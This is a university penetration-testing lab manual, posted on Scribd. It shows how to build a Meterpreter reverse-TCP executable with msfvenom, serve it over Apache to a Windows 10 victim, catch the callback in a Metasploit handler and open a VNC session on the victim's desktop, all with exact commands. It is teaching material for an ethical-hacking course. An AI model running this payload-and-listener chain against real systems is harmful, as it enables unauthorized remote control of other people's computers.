Scribd
Upload
2 views

Lab 5.1- VNC Session_system hacking

Uploaded by

221410313
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
2 views

Lab 5.1- VNC Session_system hacking

Uploaded by

221410313
Copyright
© © All Rights Reserved
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 10

CS Department, College of Computers &

Information Sciences
CYS405 Penetration Testing and Ethical
Hacking

Lab Manual

Lab 6: System Hacking_VNC Sessions

Course Name: CYS405

Assignment # 6

Student Name

ID

Serial Number

Grade

Q#1

Q#2

Total

Notes:

● Solve the assignment individually


● You have to use this cover page when submit your solution
● Your work must be organized, comprehensible, easy to read and follow.
● Submission should be printed out, not handwritten.
● Handwritten assignments are penalized -1.
● Print Screens should show an opened text editor with your name and student id.
Objective

The goal of system hacking is to gain access, escalate privileges, execute applications, and hide files.

The objective of this lab is to help students learn to monitor a system remotely and to
extract hidden files and other tasks that include:

• Extracting administrative passwords


• Hiding files and extracting hidden files
• Recovering passwords
• Monitoring a system remotely
Exploiting Client Side Vulnerabilities and Establishing a VNC
Session

Lab Scenario

VNC enables attackers to remotely access and control computers targeted from another computer or
mobile device, wherever they are in the world. At the same time, it is also used by network
administrators and organizations throughout every industry sector for a range of different scenarios
and use cases, including providing IT desktop support to colleagues and friends, and accessing
systems and services on the move. Here, we will see how attackers can exploit vulnerabilities in target
systems to establish unauthorized VNC sessions and remotely control these targets.

Lab Objectives

The objective of this lab is to help students learn how to exploit client-side vulnerabilities and
establish a VNC session.

1. Click Kali Linux


2. Open a terminal window and type msfvenom -p windows/meterpreter/reverse_tcp --
platform windows -a x86 -f exe LHOST=10.10.10.11 LPORT=444 -o
/root/Desktop/Test.exe and press Enter.
The command creates a Test.exe exploit on the Kali machine's Desktop.

Here 10.10.10.11 is the IP of the Kali machine.


3. Now create a directory to share this file to victim’s machine, and provide the permissions
and copy the file from Desktop to shared location. To do that , follow the following steps:
o Type mkdir /var/www/html/share and press Enter to create a share folder.
o Type chmod -R 755 /var/www/html/share and press Enter.
o Type chown -R www-data:www-data /var/www/html/share press Enter.
o Now move the malicious file to the shared location by typing mv
/root/Desktop/Test.exe /var/www/html/share and press Enter.

4. Start the Apache server by typing service apache2 start and press Enter.
5. In the terminal window, type msfconsole and press Enter to start the Metasploit
Framework.

6. Once the metasploit framework starts and you get a msf command line, type the
following commands to set up a listener:
o Type use multi/handler and press Enter.
o Type set payload windows/meterpreter/reverse_tcp and press Enter.
o Type set LHOST 10.10.10.11 and press Enter.
o Type set LPORT 444 and press Enter.

To start the listener, type run and press Enter.

7. Click Windows 10 machine on vmware workstation


8. Open a browser (in this lab we are using Chrome browser) and in the address bar
type http://10.10.10.11/share and press Enter.
As soon as you press Enter, it will display the share folder contents as shown in the screenshot.
Click Test.exe file to download
9. Save As window appears, in this lab we select Desktop as the saving location and
click Save button.

10. The Test.exe file gets saved on the Desktop of Windows 10 machine, double-click the
executable to run it.

If Windows SmartScreen pop-up appears, click Run

11. click Kali Linux, observe that one session is created or opened in the Meterpreter shell.

If the meterpreter command line does not start interacting with the victim machine automatically,
type sessions -i 1 and press Enter to start interacting with the victim machine
12. In the meterpreter command line type sysinfo and press Enter to get the system
information of the victim machine.
13. Type run vnc and press Enter to start a VNC session with the victim.

14. TightVNC: window appears with the victim Desktop showing in the window.
15. Close all the open windows after finishing the lab.

In this lab you learned how to exploit client side vulnerabilities and establish a VNC session.

You might also like